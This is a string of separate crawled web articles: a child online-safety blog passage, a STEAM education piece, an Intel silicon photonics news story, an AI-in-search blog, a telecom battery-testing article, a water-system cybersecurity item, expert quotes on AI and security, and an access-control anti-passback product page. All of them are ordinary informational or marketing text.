of inappropriate behavior, emphasizing the importance of maintaining a safe and respectful online environment with their friends. By instilling these values, parents empower their children to contribute positively to the digital community they are part of, ensuring that their online interactions mirror the same respect and consideration they would demonstrate in face-to-face interactions. Monitor Online activities Monitoring the online activities of your kids is a responsible approach to ensuring their safety and well-being in the digital realm and their everyday connections with others. As a proactive step, parents can collaborate with their internet service provider to implement parental controls that limit access to inappropriate content and establish boundaries for online access. Regularly reviewing their kids online interactions, the websites they visit, and the apps they use allows parents to identify potential risks and initiate constructive conversations about responsible internet use. By maintaining an open and supportive dialogue and explain age limits for current websites, parents can strike a balance between protecting their children and fostering their autonomy, ultimately creating a secure and enriching online environment where kids can explore and learn while staying safe. Balancing trust and supervision when it comes to online activities Striking a delicate balance between trust and supervision is essential when guiding your child's online activities. While fostering a sense of autonomy is crucial, it's equally important to prioritize their internet safety, but on the other hand understand their desires and keeping their comfort zone. Engaging in open conversations about the potential risks associated with sharing personal information online helps children understand the importance of safeguarding their identity. By setting clear guidelines and periodically checking their online interactions, parents can ensure a safe digital experience without stifling their child's exploration. This balance encourages responsible online behavior that mirrors real-life interactions, empowering kids to make informed choices while navigating the vast online realm. Stay Updated on the Latest Online threats Staying updated on the latest online threats is fundamental when it comes to protect your kids in the digital realm. As technology evolves, new challenges and threats may arise on a daily basis, making it essential for parents to stay informed about potential risks that could affect their children's internet safety. Regularly checking for news and updates on online security, particularly related to mobile phones, online accounts, and instant messaging programs, empowers parents to stay one step ahead of potential dangers and ensure their kids have a better online environment. By remaining vigilant and educated, parents can effectively guide their children on how to navigate the digital world safely while also imparting valuable lessons about responsible online behavior and the importance of staying cautious in a rapidly changing online landscape. Advocating for schools and community organizations to provide resources and workshops on online safety It is crucial for schools and community organizations to prioritize the provision of resources and interactive workshops on safe web usage. This ensures that every child is prepared to navigate the web world with the growing integration of online learning, and the use of platforms becomes essential for schools to actively educate students about risks and effective practices to safeguard their online accounts. By partnering with community organizations, parents can contribute to building an environment where children can acquire skills such as identifying online threats and understanding the significance of privacy settings. These resources and workshops offer tools that empower individuals to make informed decisions while interacting online. This fosters a culture of responsibility, ultimately contributing to a more secure online experience for everyone involved. Cyberbullying Prevention and Intervention It is important to be proactive in preventing cyberbullying and intervening effectively to keep your children safe in today's digital era. As kids engage with their friends, both offline and online, it is vital to promote a culture that values respect and empathy. Engage in discussions about the dangers of cyberbullying, emphasizing the significance of treating others with kindness regardless of whether they have met online or in person. Inform and encourage your kids to be vigilant and speak up if they witness or experience any form of online harassment. Equipping them with strategies to report and block harmful behavior can empower them to navigate the digital realm confidently. By instilling a strong sense of empathy and responsibility, parents can play a pivotal role in creating a safe and supportive online environment where kids can explore, connect, and learn while treating others with dignity and compassion. Steps to take if a child becomes a victim of cyberbullying If a child falls victim to cyberbullying, it is crucial to take supportive action. Start by providing a non-judgmental space for them to express their experiences and emotions. Encourage them to gather evidence of the cyberbullying, such as screenshots or messages, as this can be vital when reporting and seeking intervention. Reach out to the platform or website to report the behavior and ask for assistance in removing harmful content. In persistent cases of cyberbullying involving school authorities, or law enforcement might become necessary. Let your child know that they are not alone, and assure them that you will tackle the situation together. Offer support while guiding them towards online interactions, which can help restore their sense of security and confidence in their online experiences. Promoting a positive and inclusive online environment Creating a positive and inclusive environment for your children involves instilling values like empathy, respect, and responsible behavior in their interactions across various digital platforms. Encourage them to view their devices and online accounts as tools for building connections and making a positive impact on online communities. Teach them the importance of treating others with kindness, both online and offline. Guide them on how to navigate conflicts or disagreements in a positive way. By emphasizing the significance of manners and helping them understand the consequences of their words and actions, parents can empower their kids to shape a space that mirrors the inclusive and compassionate values they adhere to in their everyday lives. Nowadays, every child has a computer, mobile phone, and other smart devices around. We live in a world where digital technologies are constantly upgrading. It is not a bad thing that every kid has a smartphone in his pocket or a computer at home, but teaching our kids about the potential risks out there is essential to maintaining their mental health. As parents, we all know what kind of dangers can hide behind the screens, and it is our responsibility to educate them not only about the risks but also to be kind and empathic around the web. Thus, we will make them more comfortable while browsing the internet, communicating, or playing games with friends. Every parent should explain that nowadays, technologies are good but need attention because of the potential risks they hide. By doing so, a child can become a responsible adult. A Swiss company founded in Singapore in 2003, Acronis has 15 offices worldwide and employees in 50+ countries. Acronis Cyber Protect Cloud is available in 26 languages in 150 countries and is used by over 20,000 service providers to protect over 750,000 businesses.
<urn:uuid:d9cc876a-03a6-47dd-9362-5a9183b2724d>
CC-MAIN-2024-38
https://www.acronis.com/en-sg/blog/posts/how-to-protect-your-child-online/
2024-09-20T16:12:45Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701419169.94/warc/CC-MAIN-20240920154713-20240920184713-00012.warc.gz
en
0.936364
5,702
3.109375
3
2020 brought many challenges to learning, and now districts across the country are working to address what has been termed “learning loss”—or the term I prefer “unfinished learning.” Some of the funding that schools are using to help support these programs include ESSER funds from the CARES and ARP Acts. We are seeing a trend where more schools are adopting an adaptive curriculum and addressing student engagement with STEM programs. Some of this is due to the requirements behind the ARP ESSER funds, but most of it is because schools recognize the need to prepare students for their future, which includes globally competitive markets based on technology. Science, technology, engineering, art, and mathematics (STEAM) are grouped together to create powerful learning opportunities where students have the chance to uncover their interests and explore ideas that may not come out of traditional, single subject curriculum. Sometimes, STEAM is misunderstood to be its own separate subject, but connecting these subjects encourages educators to integrate other disciplines into lessons and allow students the opportunity to apply learning in new and creative ways. Consider a lesson on money. This lesson could easily have science, technology, and engineering incorporated by extending the lesson to include a hands-on practical learning experience. The extension could be asking students to build a structure with materials that have a cost associated with them. It could be constrained to certain dimensions and required to hold a specific amount of weight within a cost budget. At the end of the lesson, students could create a “shark tank” type of media presentation to convince investors to support their project. Not every lesson or STEAM engagement should be scripted. A true STEAM environment nurtures curiosity, critical thinking, collaboration, creativity, communication, and citizenship. STEAM environments allow for movement, conversation, respectful disagreements, and collaborative support of ideas. I’ve had a lot of engagements with senior executives at some of the world’s largest engineering firms and asked them what they are looking for in their future workforce. While they all want their employees to have technical skills, they were very clear that they are looking for employees that are creative, understand how to work with people, and can help to create a culture of innovation and collaboration amongst peers. STEAM learning isn’t a trend, and it isn’t going away. If you are looking for what types of STEAM learning tools to add to your lessons, start with adapting one lesson you already teach and extend it to include STEAM. When you are ready to move beyond that and incorporate other disciplines such as computer science, look for products that include a robust curriculum. Most importantly, know that it’s okay if you aren’t an expert on things like coding and robotics. Be honest with your students and allow your students to be the functional experts while you remain the facilitative expert.
<urn:uuid:9a8575ad-1b8d-4d12-97b2-6a6223418fd3>
CC-MAIN-2024-38
https://community.connection.com/its-time-for-your-school-to-embrace-steam-powered-learning/
2024-09-09T18:40:16Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651133.92/warc/CC-MAIN-20240909170505-20240909200505-00112.warc.gz
en
0.962388
580
3.046875
3
Researchers with Intel have moved a step closer toward integrating silicon chips and lasers in a new field the company calls silicon photonics— the process of creating on-chip components that can use light to transmit data. On July 24, researchers with the Santa Clara, Calif., company announced that they had significantly increased the bandwidth with the help of a laser modulator that will now allow data to transmit at 40 gigabits per second. Previously, Intel had announced gear running at 10Gbps in its labs. The next step, said Mario Paniccia, an Intel fellow and director of the companys Photonics Technology Lab, will be to use 25 of these silicon laser modulators, each working at 40Gbps, to produce a 1 terabit-per-second, high-speed optical link. A terabit equals 1,000 billion bits. This latest development, Paniccia said, is an enormous step toward the companys goal of developing products built around silicon photonics technology, including practical uses inside enterprise data centers and also with telecommunications companies. The ability of the silicon laser modulators to reach 40Gbps now means that the technology can match the speed of the fastest modulators available in the market now. So far, Intel and its researchers have not offered specific guidelines or road maps for products to be built using silicon photonics, although the company has said it has plans to incorporate some of the technology into commercial products by the end of the decade. When Paniccia first began experimenting with silicon photonics, his labs were able to transmit data at only 1Gbps. The jump to 10Gbps and then to 40Gbps shows how far the companys research has come since those first days. “The fact that were actually transmitting at 40 gigabits per second is an enormous leap forward in performance,” Paniccia told eWEEK. “This development gives us an idea about what is happening now. Weve looked at the building blocks and proved that we can do this.” The laser modulator that Intel used to achieve 40Gpbs is smaller and consumes less power than the previous ones used to achieve 10Gbps. The modular is based on what Paniccia calls a traveling wave design that transmits the data. Intels labs have been working for some time to develop silicon photonics as a replacement for traditional electrical interconnects, which use copper wiring to speed up the connections to move data to and from microprocessors. Silicon photonics, however, is expensive and requires what Intel calls exotic materials to make this technological experiment a reality. The goal of the research is to develop photonic devices using silicon as the base material and use high-volume manufacturing processes that already exist at the companys fabs to help reduce the cost of bringing the technology to the commercial market. Intel also has a keen interest in this technology to develop high-bandwidth interconnects that can move more data. This is especially important for the companys development of multicore chips and its other experiments with what Intel calls “tera-scale” computing. Earlier this year, the company detailed its efforts behind developing an 80-core chip, although this remains a proof-of-concept design. Eventually, researchers believe they will be able to develop an integrated silicon photonic chip that can be used to achieve the I/O needed to realize the full potential of the companys tera-scale computing efforts. A more practical use for silicon photonic technology in the data center, Paniccia said, would be to connect servers to one another without the traditional constraints of cables currently used to link the backplanes of systems. Eventually, the technology could be used to achieve a connection between CPUs or between CPUs and memory, replacing traditional copper wiring. On its way to scaling the laser modulators up to 1Tbps, Paniccia said researchers first will look to sustain performance at 100Gbps and 200Gbps.
<urn:uuid:44a4306e-c738-4f8e-a371-d58887f5385b>
CC-MAIN-2024-38
https://www.eweek.com/networking/intel-takes-next-step-in-developing-silicon-photonics/
2024-09-09T19:09:05Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651133.92/warc/CC-MAIN-20240909170505-20240909200505-00112.warc.gz
en
0.950374
805
2.890625
3
Artificial intelligence (AI) is rapidly changing the search industry and is expected to continue doing so in the coming year. With the advancements in natural language processing, machine learning, and deep learning, AI is making search engines more intelligent and efficient in understanding user queries and providing relevant results. Let’s discuss some of the ways AI will change search in the coming year. AI will enable search engines to provide personalized search results based on user preferences and behaviour. By analysing user search history, location, and interests, AI algorithms can deliver customized results tailored to the user’s needs. This means that two people searching for the same term may get different results depending on their individual preferences. Voice search has become increasingly popular with the rise of smart speakers and virtual assistants. With the help of AI, voice search will become even more accurate and reliable. AI algorithms will analyse voice commands, natural language and context to provide more accurate and relevant results. Voice search will also become more conversational, enabling users to ask follow-up questions and receive personalized responses. Visual search allows you to search for images using pictures rather than text. With the help of AI, visual search will become more sophisticated and accurate. AI algorithms will analyse the image and provide relevant results based on visual features such as colour, shape, and texture. Visual search will also be able to recognise objects and provide information about them. Natural language processing Natural language processing (NLP) is the ability of machines to understand human language. With the help of NLP, search engines will be able to understand the context and intent behind user queries, providing more accurate and relevant results. NLP will also enable search engines to understand conversational queries, allowing you to search for information in a more natural way. Semantic search is a search technique that analyses the meaning of words and phrases to provide more relevant results. With the help of AI, semantic search will become even more accurate and effective. AI algorithms will be able to understand the relationships between words and concepts, enabling them to provide results that are more closely related to user intent. Predictive search is the ability of search engines to predict what a user is searching for based on their search history and behaviour. With the help of AI, predictive search will become more accurate and reliable. Algorithms will be able to analyse user behaviour and provide relevant suggestions before the user even finishes typing their query. Conversational search is a search technique that allows users to ask questions in a conversational tone, as if they were talking to a person. With the help of AI, conversational search will become more natural and effective. AI algorithms will be able to understand the context and intent behind the user’s query, enabling them to provide more accurate and relevant results. Augmented search is a search technique that combines search results with other data sources such as social media, news, and events. With the help of AI, augmented search will become more effective in providing relevant and timely results. AI algorithms will be able to analyse multiple data sources and provide a comprehensive view of the topic being searched. AI and search As you can see, AI will continue to revolutionize the search industry in the coming year. Just as it is changing the way we create content and images, it will change the way we use the web and how search engines will use the information we provide for rankings. With advancements in NLP, machine learning, and deep learning, search engines will become more intelligent and efficient in understanding user queries and providing relevant results. These advancements will enable us to find information more quickly and easily, and search engines to deliver more accurate and relevant results. Personalised, voice, visual, semantic, predictive, conversational, and augmented search will all offer opportunities and challenges to marketers, businesses, web designers, SEOs and anyone who works with search. So, as usual, new technology offers both challenges and opportunities to those in the industry. If nothing else, the next couple of years are going to be very interesting!
<urn:uuid:c0edd5b3-7410-4eaf-85c3-ae2a5d3279c6>
CC-MAIN-2024-38
https://cloudheroes.com/blog/the-impact-of-ai-and-search-over-the-coming-year/
2024-09-11T00:36:16Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651323.1/warc/CC-MAIN-20240910224659-20240911014659-00012.warc.gz
en
0.933173
839
2.984375
3
If there is any organization on the planet that has had a closer view of the coming demise of Moore’s Law, it is the Institute of Electrical and Electronics Engineers (IEEE). Since its inception in the 1960s, the wide range of industry professionals have been able to trace a steady trajectory for semiconductors, but given the limitations ahead, it is time to look to a new path—or several forks, to be more accurate. This realization about the state of computing for the next decade and beyond has spurred action from a subgroup, led by Georgia Tech professor Tom Conte and superconducting electronics researcher, Elie Track called “Rebooting Computing,” which produces reports based on invite-only deep dives on a wide range of post-Moore’s Law technologies, many of which were cited here this week via Europe’s effort to pinpoint future post-exascale architectures. The Rebooting Computing effort is opening its doors next week for a wider-reaching, open forum in San Diego to bring together new ideas in novel architectures and modes of computing as well as on the applications and algorithm development fronts. According to co-chair of the Rebooting Computing effort, Elie Track, a former Yale physicist who has turned his superconducting circuits work toward high efficiency solar cells in his role at startup Nvizix, Moore’s Law is unquestionably dead. “There is no known technology that can keep packing more density and features into a given space and further, the real issue is power dissipation. We just cannot keep reducing things further; a fresh perspective is needed.” The problem with gaining that view, however, is that for now it means taking a broad, sweeping look across many emerging areas; from quantum and neuromorphic devices, approximate computing, and a wide range of other technologies. “It might seem frustrating that this is general, but there is no clear way forward yet. What we all agree on is that we need exponential growth in computing engines.” “This end of CMOS scaling, coupled with the explosion of big data and the need for more compute power for both civilian and military applications, requires the kind of exponential growth we have enjoyed for so many years. But that is the challenge; this is a crisis. This is an inflection point. Incremental improvements are not the solution, but the improvements we need might come from other areas in computing.” The IEEE Rebooting Computing initiative has three main pillars, as Track explains. These include targeting new technology approaches that emphasize energy efficiency, security, and the human-application interfaces that make this all possible. Under this is an “engine room” of the host of non-traditional architectures that break beyond existing silicon barriers. It is worth taking note of what topics generate the most heat in the IEEE Rebooting Computing initiative because this is where government will take at least some of its cues for future investment. We pressed Track to detail which of the many architectures and approaches being presented seem to have the most traction. While the augmentation of continued CMOS (pushing Moore’s Law to the very end) is always a hot topic (this is especially the case in the Department of Energy with its exascale-class supercomputers still dependent on traditional scaling), the most controversy and diversity of ideas is happening around neuromorphic computing“There are many ideas here; a much higher density that stretches across both devices and architectures.” Other topics that have wider pools of research to pool are in approximate computing and on the software side, bolstering the human-computer interface. Despite the lack of direction or emphasis on one “saving grace” technology among the many being explored, Track says the reboot work is valuable for government agencies as they decide where to invest. Among the many agencies downwind of the most recent presidential green light, the National Strategic Computing Initiative, is IAPRA, which Track says is doing some of the most bleeding edge, practical work to push new silicon alternatives from concept to reality. Programs that explore novel approaches to computing at IARPA run between 3-5 years. Track was associated with the C3 superconducting electronics group, which we will cover in a future article. While IARPA is focused on exploring some entirely new modes of computing, other agencies are forced to stay on the current CMOS track for practical reasons, including the need to keep scientific progress humming along via the same software frameworks. This is the case for the Department of Energy (DoE), which will, at this point, continue to follow traditional system design choices into the exascale era based on large-scale, heterogeneous platforms for the most part, all of which push closer to the 20MW power ceiling proposed by exascale decision-makers in the government and DoE. The Department of Energy (DoE) is another agency that has mission-critical workloads it wants to bolster using novel architectures, and given the emphasis on systems that go beyond HPC (embedded, for instance) their research efforts are more wide-ranging. DARPA has also done pioneering work on novel approaches to computing, most notably with their efforts to support neuromorphic computing, which is on the radar for the IEEE Rebooting Computing program. The National Science Foundation (NSF) also funds various initiatives and efforts that serve the goals put forth in NSCI. Despite these various efforts, Track says it is critical for the NSCI program to start to center on new programs that focus on a few of the technologies that will be presented this week and in their reports. “Everyone is waiting on the next election to see what programs are defined and how the funding will work. There is a need for better defined programs but we are still watching this take shape.” Rebooting computing as we know it is a strategic imperative for research and enterprise reasons, but it will be a long road ahead, especially for those who cannot invest in untested technologies in the next decade. However, as Track mentions, getting the government and broader industry understanding which new approaches offer the most scalable, power efficient, and mass-producible results well in advance is critical.
<urn:uuid:b782591a-93b9-4cf3-b45f-9be9efd3aba7>
CC-MAIN-2024-38
https://www.nextplatform.com/2016/10/13/ieee-reboots-scans-future-architectures/
2024-09-11T00:44:59Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651323.1/warc/CC-MAIN-20240910224659-20240911014659-00012.warc.gz
en
0.964911
1,268
2.625
3
Andrew Keith, Director of Power Prove, explains the role batteries play in keeping telecom services online, and the importance of regularly testing them. The summer weather can be problematic for our power services. Soaring temperatures can affect heat-sensitive equipment, causing complications with overhead lines and power plants that are unable to cool themselves down. Other extremes like lightning storms can also pose a problem. Back in 2019, two power stations failed just seconds after a major lightning strike in London, leaving almost a million people across England and Wales without power. But with telecommunications being such an important sector, for both our convenience and our safety, it’s vital that power supply is maintained. So, how can we do this, when so much relies on the availability of mains power? An additional source of power Space and cost restrictions mean it’s not always possible for mobile base stations and street cabinets to have their own independent generator. Batteries are the most common back-up solution, which are charged up on the mains electricity and can be used in times of outages. The battery health, therefore, is critical. Taking mobile base stations as an example, each one could be responsible for supplying thousands of homes and residents with connectivity; any loss of service could have serious consequences in an emergency. It’s important to know the exact condition of each battery within the network to identify whether it’s still fit for use or if it needs replacing. But how do you determine battery health? While batteries degrade naturally over time, those that work in areas that frequently experience outages will likely degrade faster than those that don’t. This happens as a result of the partial discharging and recharging that happens with frequent outages, which affects battery condition when done repeatedly. And when it comes to testing, static measurements of battery performance don’t always give a complete picture of its health or capacity. Testing with load banks Load banks can provide the solution. A load bank is a piece of electrical test equipment, which can simulate electrical loads to test an electric power source. Often used to verify the performance of generators, they can also be used to verify battery health with a simple discharge test. By completely discharging the battery, the load bank can explicitly identify its health and condition. While load banks for generator testing are often heavy and cumbersome to transport, there are much more convenient solutions available for telecom battery testing. While the summer weather brings joy to many of us, it can be tough on our energy supply. But for industries where power is critical, and individual generators aren’t feasible, there are solutions available. Regularly testing backup power supplies helps guarantee that our essential services are there when we need them.
<urn:uuid:936bc095-391d-4236-b4b0-cd4799b97a80>
CC-MAIN-2024-38
https://datacentrereview.com/2023/09/keeping-telecoms-online/
2024-09-12T01:40:21Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651420.25/warc/CC-MAIN-20240912011254-20240912041254-00812.warc.gz
en
0.937883
558
3.125
3
Cyber threat actors have remained bold with how, when and what they target and public utility systems are not exceptions to threats posed by such actors. At least two threat actors have been linked to cyberattacks that have targeted US water systems, according to the US Environmental Protection Agency (EPA). These attacks on important water systems can interrupt water supply and put public health at risk. The recent attacks highlight the weakness of critical infrastructure to cyberattacks. To protect public service sectors like energy and utilities and oil and gas, it’s important to implement robust security strategies and versatile cybersecurity measures that comply with evolving regulations. EPA response to cyber breaches The two recent and ongoing threats to US water systems are from Iranian IRGC actors, who have exploited default passwords in operational technology at critical US infrastructure facilities, including water systems, and the Chinese state-sponsored Volt Typhoon group whose activities suggest pre-positioning to disrupt operations amid tensions or conflicts. Since water system operators lack resources for robust cybersecurity, making them vulnerable to cyberattacks, the federal government relies in part on partnerships with state and local governments to build sector resilience. However, the US government continues to make efforts to secure public with its own programs, which will now include a newly established Water Sector Cybersecurity Task Force. This task force — developed by the EPA — will work to identify near-term actions and strategies to reduce the risk of water systems nationwide to cyberattacks. Furthermore, the task force will build upon existing collaborative products, like the 2024 Roadmap to a Secure and Resilient Water and Wastewater Sector, and recommendations from the meeting with EPA, Department of Health and Human Services and Department of Homeland Security secretaries to be held on March 21. Securing public services with cyber solutions According to the EPA, collaborative effort will best result in advances that will better protect the nation’s critical water infrastructure from cyberattacks. Cybersecurity support and technical assistance are available from state programs as well as private sector associations like the American Water Works Association and National Rural Water Association. Technology solutions providers, such as global technology major HCLTech, also provide an option for services and expertise that can help secure the digital frontier for the public sector. HCLTech offers a range of end-to-end security services for public services organizations that can protect them against threats while ensuring regulatory compliance and improving cybersecurity posture. The US Cybersecurity and Infrastructure Security Agency (CISA) says that there are more than 150,000 public water systems across the US that face threats from nation states, ransomware gangs and hackers trying to steal customer information. Cybersecurity budgets are often limited for state and local governments, and many have not adopted important cybersecurity practices meant to thwart potential cyberattacks. Collaboration and training will play significant roles in developing cybersecurity best practices to secure water systems.
<urn:uuid:8904999a-3abd-47eb-9c02-e872ba48c9a6>
CC-MAIN-2024-38
https://www.hcltech.com/trends-and-insights/us-water-systems-require-cybersecurity-boost
2024-09-12T03:18:11Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651420.25/warc/CC-MAIN-20240912011254-20240912041254-00812.warc.gz
en
0.948098
568
2.671875
3
Impact of AI on Cybersecurity: Pros and Cons Analyzed By Experts AI's impact on cybersecurity has brought both advantages and challenges. On the positive side, AI has significantly enhanced threat detection capabilities by swiftly analyzing vast datasets and identifying anomalies, enabling quicker responses to potential breaches. Additionally, it has improved incident response by automating processes, reducing human error, and expediting breach containment and recovery. However, AI's adoption in cybersecurity has also introduced new challenges. Cybercriminals are now utilizing AI for more sophisticated attacks, automating the identification of vulnerabilities and crafting personalized phishing attempts. For Cybersecurity Awareness Month, we heard from experts from across the industry on the impact of AI on cybersecurity - both pros and and cons. Joe Regensburger, Vice President of Research Engineering, Immuta “AI and large language models (LLMs) have the potential to significantly impact data security initiatives. Already organizations are leveraging it to build advanced solutions for fraud detection, sentiment analysis, next-best-offer, predictive maintenance, and more. At the same time, although AI offers many benefits, 71% of IT leaders feel generative AI will also introduce new data security risks. To fully realize the benefits of AI, it’s vital that organizations must consider data security as a foundational component of any AI implementation. This means ensuring data is protected and in compliance with usage requirements. To do this, they need to consider four things: (1) “What” data gets used to train the AI model? (2) “How” does the AI model get trained? (3) “What” controls exist on deployed AI? and (4) “How” can we assess the accuracy of outputs? By prioritizing data security and access control, organizations can safely harness the power of AI and LLMs while safeguarding against potential risks and ensuring responsible usage.” David Divitt, Senior Director, Fraud Prevention & Experience, Veriff "We’ve all been taught to be on our guard about “suspicious” characters as a means to avoid getting scammed. But what if the criminal behind the scam looks, and sounds, exactly like someone you trust? Deepfakes, or lifelike manipulations of an assumed likeness or voice, have exploded in accessibility and sophistication, with deepfakes-as-a-service now allowing even less-advanced fraud actors to near-flawlessly impersonate a target. This progression makes all kinds of fraud, from individual blackmail to defrauding entire corporations, significantly harder to detect and defend against. With the help of General Adversarial Networks (GANs), even a single image of an individual can be enough for fraudsters to produce a convincing deepfake of them. Certain forms of user authentication can be fooled by a competent deepfake fraudster, necessitating the use of specialized AI tools to identify the subtle but telltale signs of a manipulated image or voice. AI models can also be trained to identify patterns of fraud, enabling businesses to get ahead of an attack before it hits. AI is now at the forefront of fraud threats, and organizations that fail to use AI tech to defend themselves will likely find themselves the victim of it." “There are a number of commonly used verification tools out there today, like multi-factor authentication (MFA) and knowledge-based authentication. However, these tools aren’t secure enough on their own. With the rise of new technologies like generative AI, cybercriminals can develop newer and more complex attacks that organizations need to be prepared for. Fraudsters can leverage ChatGPT, for instance, to create more convincing and targeted phishing scams to increase their credibility and impact, victimizing more users than before. This month’s emphasis on cybersecurity reminds us that organizations must build a strong foundation starting with user verification and authentication to efficiently protect customer and organizational data from all forms of fraud. Strong passwords and MFA are always beneficial to have, but with the increasing sophistication of cyberattacks, organizations must implement biometric-backed identity verification methods. By cross-referencing the biometric features of an onboarded user with those of the cybercriminal attempting to breach the company, organizations can prevent attacks and ensure that the user accessing or using an account is authorized and not a fraudster, keeping vital data out of criminals’ reach.” “This Cybersecurity Awareness Month is unlike previous years, due to the rise of generative AI within enterprises. Recent research found that 75% of security professionals witnessed an increase in attacks over the past 12 months, with 85% attributing this rise to bad actors using generative AI. The weaponization of AI is happening rapidly, with attackers using it to create new malware variants at an unprecedented pace. Current security mechanisms rooted in machine learning (ML) are ineffective against never-before-seen, unknown malware; they will break down in the face of AI-powered threats. The only way to protect yourself is with a more advanced form of AI. Specifically, Deep Learning. Any other NL-based, legacy security solution is too reactive and latent to adequately fight back. This is where EDR and NGAV fall short. What’s missing is a layer of Deep Learning-powered data security, sitting in front of your existing security controls, to predict and prevent threats before they cause damage. This Cybersecurity Awareness Month, organizations should know that prevention against cyber attacks is possible – but it requires a change to the “assume breach” status quo, especially in this new era of AI.” “This Cybersecurity Awareness Month (CAM), a message to business leaders and technical folks alike: Software is immensely pervasive and foundational to innovation and market leadership. And if software starts with code, then secure or insecure code starts in development, which means organizations should be looking critically at how their code is developed. Only when code is clean (i.e. consistent, intentional, adaptable, responsible) can security, reliability, and maintainability of software be ensured. Yes, there has been increased attention to AppSec/software security and impressive developments in this arena. But still, these effort are being done after the fact, i.e. after the code is produced. Failing to do this as part of the coding phase will not produce the radical change that our industry needs. Bad code is the biggest business liability that organizations face, whether they know it or not. And chances are they don't know it. Under their noses, there is technical debt accumulating, leading to developers wasting time on remediation, paying some small interest for any change they make, and applications being largely insecure and unreliable, making them a liability to the business. With AI-generated code increasing the volume and speed of output without an eye toward code quality, this problem will only worsen. The world needs Clean Code. During CAM, we urge organizations to take the time to understand and adopt a ‘Clean as You Code’ approach. In turn, this will stop the technical debt leak, but also remediate existing debt whenever changing code, reducing drastically the cybersecurity risks, which is absolutely necessary for businesses to compete and win -- especially in the age of AI.” David Menichello, Director, Security Product Management at Netrix "Generative AI is creating an imbalance between offensive and defensive security teams. Generative AI is accelerating the development of exploits and payloads on the offensive side. Likewise, it is a good tool for the blue teams who defend their networks and applications for finding ways to automate and bridge gaps in a population of IT assets that could be vulnerable and not under one management program that’s easily patched, secured, or interrogated for susceptibility to attacks. There will always be an imbalance because the attack side can weaponize exploits quicker than the defense side and assess, test, and patch." “First and foremost, whether an employee has been at an organization for 20 days or 20 years, they should have a common understanding of how their company approaches cybersecurity; and be able to report common threats to security. It’s been refreshing to see security come to the forefront of conversation for most organizations. It was rare 20 years ago that cybersecurity awareness was even a training concern unless you were at a bank or regulated institution. Today, it is incredibly important that this heightened interest and attention to security best practices continues. With advancements in technology like AI, employees across industries will face threats they’ve never encountered before - and their foundational knowledge of cybersecurity will be vital. Employees today should be well-trained on security standards and feel comfortable communicating honestly with their security teams. Even more important, security leaders should ensure their organizations have anonymous alternatives for employees to report their concerns without fear of retaliation or consequence. By combining education and awareness into the foundation of your organization’s security framework, and empowering employees, the odds of the realization of a threat decrease exponentially.”
<urn:uuid:e6531e14-08b1-4411-b53e-65af83f67022>
CC-MAIN-2024-38
https://www.enterprisesecuritytech.com/post/ai-s-impact-on-cybersecurity-pros-and-cons-analyzed-by-experts
2024-09-13T09:21:49Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651510.65/warc/CC-MAIN-20240913070112-20240913100112-00712.warc.gz
en
0.94272
1,836
2.578125
3
What is Anti Passback? Prevent the passing back of access credentials Companies Choose Keri When Security Matters Most What is anti passback in access control? What is anti passback? – Anti passback (APB) security measures prevent successive entries by multiple people with the same access card, preventing ‘passing back’ of the same access card. The measure prevents keycard misuse and unauthorized access. There are various iterations of the APB measure, including soft, hard, area, and timed anti passback measures. Deciding which variant of anti passback access control is right for your business is dependent on your security requirements. Types of Anti Passback Hard Anti Passback When the anti passback rule is violated, the cardholder will be denied access. Soft Anti Passback A violation of the APB rules will result in granted access, but administrators of the system will receive an alert of the incident and the associated cardholder. Area Anti Passback Until a card is used at an ‘in’ reader at the entrance to the building, the card will not work at any readers inside the building. Timed Anti Passback Once a card has been used to enter an area, it cannot be used at the same reader again until the defined time period has passed, for example, 15 minutes. Having reviewed the types of anti passback available, let’s look at how it works… Anti passback works by recording who has entered and exited a specific area. This is achieved via access cards that have to be used in conjunction with an access reader from the access control system. Every time a card is used to enter, it must be used to exit before it can be used to enter again. An easy way to imagine this is through the following example: Person A works in a building and has a valid access card to gain entry to the building. Person B wants to gain entry to the building, but has no valid credential to do so. Person A and Person B approach the entrance and Person A swipes their access card, which grants them entry to the building. Person A then passes their credential back to Person B, who swipes the same card on the same reader, but is denied entry due to the anti passback measures on the reader. An alert is sent to the administrator to let them know of the violation of the anti passback rule. By swiping or tapping into an area, the user temporarily revokes their access, preventing them from re-entering with their credential until they have exited the area by swiping or tapping the corresponding reader. Therefore, in passing their credential back to the unauthorized person, the second use of the card to gain access is denied. A popular application of APB is at parking gates. In these settings, a user swipes their card when entering and exiting the lot. The user can enter and exit as many times as they desire, as long as the sequence remains as an ‘in and out’ pattern. However, if a user were to enter and then pass their card back to their colleague/friend/neighbor, the pattern becomes ‘in and in’, which the anti passback measure will reject and deny access to the second request for entry. Until that card has been used to exit the lot, the system will not allow entry. Example applications of anti-passback Anti-passback is commonly used in parking facilities. However, it has multiple useful applications, such as office entrances, specifically employee entrances. Protect patients, staff, and expensive equipment with anti-passback. By preventing multiple drivers from using the same access credential, parking spaces can be kept safe. Ensure only authorized cardholders can enter certain areas of the facility. Prevent customers from sharing credentials and skipping membership fees. Integrate with turnstiles or gates to ensure capacity limits are adhered to and only paying users can access the facility. Parking Lots & Multi-Storey Ensure accurate parking space counting, preventing too many cars from entering the parking lot. Prevent unauthorized vehicles from entering a certain parking area. Anti-passback ensures that only authorized guests can access your facility. Access cards cannot be passed from paying guests to unauthorized persons at the perimeter barriers to access your facility free of charge. Prevent employees from sharing credentials to access the building. Improve security and safety for employees, ensuring that unauthorized persons cannot tailgate or follow your employees into the building. Provides accurate information on employee attendance. Anti-passback provides accurate occupant information, preventing unwanted personnel from entering or removing laboratory equipment. Optimize safety and stop potentially hazardous accidents from occurring. Anti-Passback with Keri Systems Keri Systems’ Doors.NET software integrates customizable anti-passback security measures, ensuring that you can use the feature in the most effective way for your building or facility. Keri Systems offers all types of anti-passback measures and allows for full flexibility when applying these rules. For example, certain cardholders can be exempt from anti-passback rules, whereas others can have hard or soft, timed or area APB ruling depending on their role or access needs. (800) 260-5265Get A Free Quote Tell us about your project
<urn:uuid:664806ac-8f95-47ac-9388-09fbae2b9dd1>
